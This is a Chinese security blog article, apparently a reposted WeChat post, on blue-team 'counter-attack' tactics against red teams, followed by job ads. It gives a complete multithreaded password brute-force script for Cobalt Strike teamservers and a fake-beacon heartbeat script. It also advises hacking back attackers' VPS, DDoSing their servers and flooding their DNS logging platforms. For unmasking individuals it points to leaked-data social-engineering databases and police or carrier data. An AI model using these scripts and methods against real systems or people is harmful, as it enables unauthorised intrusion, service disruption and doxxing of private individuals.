红蓝对抗系列之浅谈蓝队反制红队的手法一二

红蓝对抗系列之浅谈蓝队反制红队的手法一二
2022-9-2 00:0:53 Author: 白帽子(查看原文) 阅读量:23 收藏

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。

No.1

取证反查

针对ip 溯源一二

一般来说，红队大部分都是使用代理节点进行测试，假如我们捕获或者从样本里面分析拿到了真实的ip ，那么以下操作场景就有用了，或者使用钓鱼反钓的方式获取到了真实ip。

1: ip > 来自cdn 、云waf 等厂商节点流量ip

ip，假如前面还有一层云waf 、cdn厂商等，那么需要协调到提供服务的厂商，快速获取到云waf 或者cdn 之前的节点real_ip , 然后拿到了真实ip 就是下面的常规溯源操作。

2: ip> whois ，域名反查

ip ，初步可进行 whois 查询, 以及域名反查，查看历史的的解析、以及历史的ip拥有记录，运气好的话，假如攻击队成员使用的是自己的博客之类的vps 常用节点，那么很有可能能够通过这个手法进行溯源到相关人员。

3: ip > 探测端口，服务，进行反渗透vp

ip，对该ip 进行端口探测、服务探测，进行反渗透。一般来说红队的vps 都是在一些国内外的一些vps 主机供应商或者云服务供应商那边购买，假如是国内的话，可通过公安网警进行协助查水表，获取真实人员身份。假如我们反渗透成功，那么可提取历史登入记录，历史ip，网络连接、进程、以及攻击工具、进程、内存镜像等方式进行取证分析。

4: Ip> 威胁情报

ip，对使用威胁情报进行综合分析，查看该ip他人对该ip 打的标签、历史解析记录、历史变更记录、以及该ip上面关联的相关样本，这些都能够获取到进行进一步分析。

5: Whois > 邮箱，qq，手机号 > 社工库

通过ip的whois 获取到了相关人员的qq 或者邮箱或者手机号，那么可使用社工库，进行社工查询，比如twitter 的社工库机器人或者自行研究的社工库进行综合关联分析。

6: 手机号 > qq，微信，抖音，陌陌，脉脉等接口

获取到了手机号，那么可通过qq 、微信、抖音、陌陌、脉脉等接口进行关联，一般而言获取到了手机号初步可通过这种简单易行的手法去溯源到红队人员。

7: 手机号 > ga数据，运营商数据

当然，如果你有办法能通过ga资源，或者直接通过运营商拿数据，那就更好了。

8: Ip 反查相关推荐

Whois 查询：

http://ipwhois.cnnic.net.cn/

批量ip归属：

http://ip.tool.chinaz.com/siteip

http://www.jsons.cn/ipbatch/

https://ip.tool.chinaz.com/

http://cip.cc/

威胁情报推荐地址：

https://x.threatbook.cn/

https://ti.dbappsecurity.com.cn/

样本查询地址：

https://www.virustotal.com/

精准定位：

https://www.ipuu.net/

https://chaipip.com/aiwen.html

No.2

常见红队被反杀的姿势

使用个人工作PC，且浏览器里面保存了Baidu、163、Sina等登陆凭据，攻击对抗过程中踩到蓝队蜜罐，被JsonP劫持漏洞捕获安全社交id，从而被溯源到真实姓名和所在公司。
可能是蓝方封禁IP太厉害的原因，红队个人或团队，使用自己的网站vps进行扫描，vps上含有团伙组织HTTPS证书、或VPS IP绑定的域名跟安全社交id对应，从而被溯源到真实姓名和所在公司。
部分攻击队写的扫描器payload里面含有攻击者信息，如使用了私有DNSlog、攻击载荷里面含有安全社交id、含有个人博客资源请求等。
投递的钓鱼邮件内木马样本被蓝队采集、逆向、反控C2C、溯源到个人信息。
虚拟机逃逸打到实体机，暴露个人全部真实信息的。

No.3

反制红队基础设施的骚操作

Cobalt Strike 反制

在防守里面，必不可少的是邮件钓鱼，或者社工钓鱼，一般来说钓鱼的样本无非这几种：

exe 、elf 可执行文件，以及加了料的doc 类的宏木马。一般而言，目前红队主要是通过Cobalt Strike 生成相关上线的shell ，那么针对Cobalt Strike 如何进行反制呢。

1：批量上线钓鱼马，启几百个进程，ddos 红方的cs 端

假如我们获取到了红方的cs 样本，那么第一种方法可批量启几百个进程运行该样本（注意与真实环境隔离好，蓝队别自己送人头了），然后红方的cs 端几乎瘫痪，无法使用。

直接附github 地址：

https://github.com/Tk369/pluginS/blob/master/ll.py

2：爆破cs 密码

此计名为：釜底抽薪。

一般而言，红队的cs设施为了多人运动，密码通常不会太复杂，有很大机会是弱口令为主，甚至Teamserver端口50050，那么针对cs 端控制端，可直接进行爆破密码，然后进行釜底抽薪

附cs 爆破密码脚本

# !/usr/bin/env python3
import time,socket,ssl,argparse,concurrent.futures,sys
MIN_PYTHON = (3, 3)if sys.version_info < MIN_PYTHON:    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)
parser = argparse.ArgumentParser()
parser.add_argument("host",                    help="Teamserver address")parser.add_argument("wordlist", nargs="?",                    help="Newline-delimited word list file")
args = parser.parse_args()
class NotConnectedException(Exception):    def __init__(self, message=None, node=None):        self.message = message        self.node = node
class DisconnectedException(Exception):    def __init__(self, message=None, node=None):        self.message = message        self.node = node
class Connector:    def __init__(self):        self.sock = None        self.ssl_sock = None        self.ctx = ssl.SSLContext()        self.ctx.verify_mode = ssl.CERT_NONE        pass
    def is_connected(self):        return self.sock and self.ssl_sock
    def open(self, hostname, port):        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.sock.settimeout(10)        self.ssl_sock = self.ctx.wrap_socket(self.sock)
        if hostname == socket.gethostname():            ipaddress = socket.gethostbyname_ex(hostname)[2][0]            self.ssl_sock.connect((ipaddress, port))        else:            self.ssl_sock.connect((hostname, port))
    def close(self):        if self.sock:            self.sock.close()        self.sock = None        self.ssl_sock = None
    def send(self, buffer):        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")        self.ssl_sock.sendall(buffer)
    def receive(self):        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")        received_size = 0        data_buffer = b""
        while received_size < 4:            data_in = self.ssl_sock.recv()            data_buffer = data_buffer + data_in            received_size += len(data_in)
        return data_buffer
def passwordcheck(password):    if len(password) > 0:        result = None        conn = Connector()        conn.open(args.host, 50050)        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))        conn.send(payload)        if conn.is_connected(): result = conn.receive()        if conn.is_connected(): conn.close()        if result == bytearray(b"\x00\x00\xca\xfe"): return password        else: return False    else: print("Do not have a blank password!!!")
passwords = []
if args.wordlist: passwords = open(args.wordlist).read().split("\n")else:     for line in sys.stdin: passwords.append(line.rstrip())
if len(passwords) > 0:    attempts = 0    failures = 0
    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}        for future in concurrent.futures.as_completed(future_to_check):            password = future_to_check[future]            try:                data = future.result()                attempts = attempts + 1                if data:                    print ("Successful Attack!!!")                    print("Target Password: {}".format(password))            except Exception as exc:                failures = failures + 1                print('%r generated an exception: %s' % (password, exc))
else:    print("Password(s) required")

3：假上线

我们只需要发送心跳包，即可模拟上线，并且攻击者无法执行命令，只能干着急。

也就是模拟cs 上线，直接附代码。

使用时更改换IP或域名、port、cookie

# coding: utf-8
import reimport timeimport requests
def heartbeat():    url = "http://192.168.186.133:333/activity"    headers = {            'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',            'Host': '192.168.186.133:333',            'Accept': '*/*',            'Connection': 'Keep-Alive',            'Cache-Control': 'no-cache',            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'        }    resp = requests.get(url=url,headers=headers)    text = resp.content.hex()    return text
x = Truewhile x:    text = heartbeat()    lengs = len(text)    # print(lengs, "    ", text)
    if '2f4320' in text and '000041' in text:        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
        commeds = re.findall(r'2f4320(.*?)000041', text)        for comm in commeds:            commed = bytes.fromhex(comm).decode('utf-8')            print(commed)    time.sleep(5)

针对dnslog 的反制

此计可用混水摸鱼计策：乘其阴乱，利其弱而无主。随，以向晦入宴息。

解释：通过流量设备审计到他人的dnslog 平台的url payload，那么针对他的url payload 可进行反制。一般而言，常见的公开的dnslog 平台，蓝队防守的时候可对常见dnslog 平台进行屏蔽即可，那么针对自行搭建的dnslog 平台有以下思路进行反制。

dnslog反制

可进行批量ping 捕获到的dnslog ，然后恶意扰乱他自行搭建的，恶意制造各种垃圾dnslog数据，让他无法获取到有效信息。直接让红队人员被迫废弃一个红队基础设施。具体可以写个脚本比如站长之家之类的进行批量ping ，进行探测存活。

httplog反制

http log 同理，使用爬虫节点，批量进行request 请求捕获的http url 即可，这样红队的dnslog 平台几乎彻底报废。

以上，是作为防守蓝队，如何对红队的攻击行为，进行反制的一些思路总结。

No.4

总结

以上就是针对从取证反查、到对红队的基础设施进行反制的常规手法。

参考：

https://k8gege.org/p/40523.html

https://www.anquanke.com/post/id/219059

https://mp.weixin.qq.com/s/vZzDUZsqfAZR9VRDMLXxJA

https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw

招聘启事

安恒雷神众测SRC运营（实习生）
————————
【职责描述】
1. 负责SRC的微博、微信公众号等线上新媒体的运营工作，保持用户活跃度，提高站点访问量；
2. 负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作，促进审核人员与白帽子之间友好协作沟通；
3. 参与策划、组织和落实针对白帽子的线下活动，如沙龙、发布会、技术交流论坛等；
4. 积极参与雷神众测的品牌推广工作，协助技术人员输出优质的技术文章；
5. 积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】
1. 责任心强，性格活泼，具备良好的人际交往能力；
2. 对网络安全感兴趣，对行业有基本了解；
3. 良好的文案写作能力和活动组织协调能力。

简历投递至 [email protected]

设计师（实习生）

————————

【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作，负责产品品牌设计。

【职位要求】
1、从事平面设计相关工作1年以上，熟悉印刷工艺；具有敏锐的观察力及审美能力，及优异的创意设计能力；有 VI 设计、广告设计、画册设计等专长；
2、有良好的美术功底，审美能力和创意，色彩感强；精通photoshop/illustrator/coreldrew/等设计制作软件；
3、有品牌传播、产品设计或新媒体视觉工作经历；

【关于岗位的其他信息】
企业名称：杭州安恒信息技术股份有限公司
办公地点：杭州市滨江区安恒大厦19楼
学历要求：本科及以上
工作年限：1年及以上，条件优秀者可放宽

简历投递至 [email protected]

安全招聘
————————

公司：安恒信息
岗位：Web安全安全研究员
部门：战略支援部
薪资：13-30K
工作年限：1年+
工作地点：杭州（总部）、广州、成都、上海、北京

工作环境：一座大厦，健身场所，医师，帅哥，美女，高级食堂…

【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀；
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】
1.至少1年安全领域工作经验；
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例；
4.熟练掌握php、java、asp.net代码审计基础（一种或多种）
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验，熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种（Asp.net、Python、php、java）

【加分项】
1.具备良好的英语文档阅读能力；
2.曾参加过技术沙龙担任嘉宾进行技术分享；
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者；
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者；
5.开发过安全相关的开源项目；
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先；
7.个人技术博客；
8.在优质社区投稿过文章；

岗位：安全红队武器自动化工程师
薪资：13-30K
工作年限：2年+
工作地点：杭州（总部）

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究；
2.平台化建设；
3.安全研究落地。

【岗位要求】
1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言；
2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案；
3:熟悉域安全以及内网横向渗透、常见web等漏洞原理；
4.对安全技术有浓厚的兴趣及热情，有主观研究和学习的动力；
5.具备正向价值观、良好的团队协作能力和较强的问题解决能力，善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式等相关经验者优先；
2.在github上有开源安全产品优先；
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先；
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先；
5.具备良好的英语文档阅读能力。

简历投递至 [email protected]

岗位：红队武器化Golang开发工程师
薪资：13-30K
工作年限：2年+
工作地点：杭州（总部）

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究；
2.平台化建设；
3.安全研究落地。

【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言；
2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验；
3.了解docker，能进行简单的项目部署；
3.熟悉常见web漏洞原理，并能写出对应的利用工具；
4.熟悉TCP/IP协议的基本运作原理；
5.对安全技术与开发技术有浓厚的兴趣及热情，有主观研究和学习的动力，具备正向价值观、良好的团队协作能力和较强的问题解决能力，善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先；
2.在github上有开源安全产品优先；
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先；
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先；
5.具备良好的英语文档阅读能力。

简历投递至 [email protected]

专注渗透测试技术

全球最新网络攻击技术

END

文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246326&idx=1&sn=c820f7da335b9bdc62aa0a97e831dfe3&chksm=82ea571fb59dde090275d2e3966f5c6491ba3bc52ac98bd41539cb905b574232e136427892c8#rd
如有侵权请联系:admin#unsafe.sh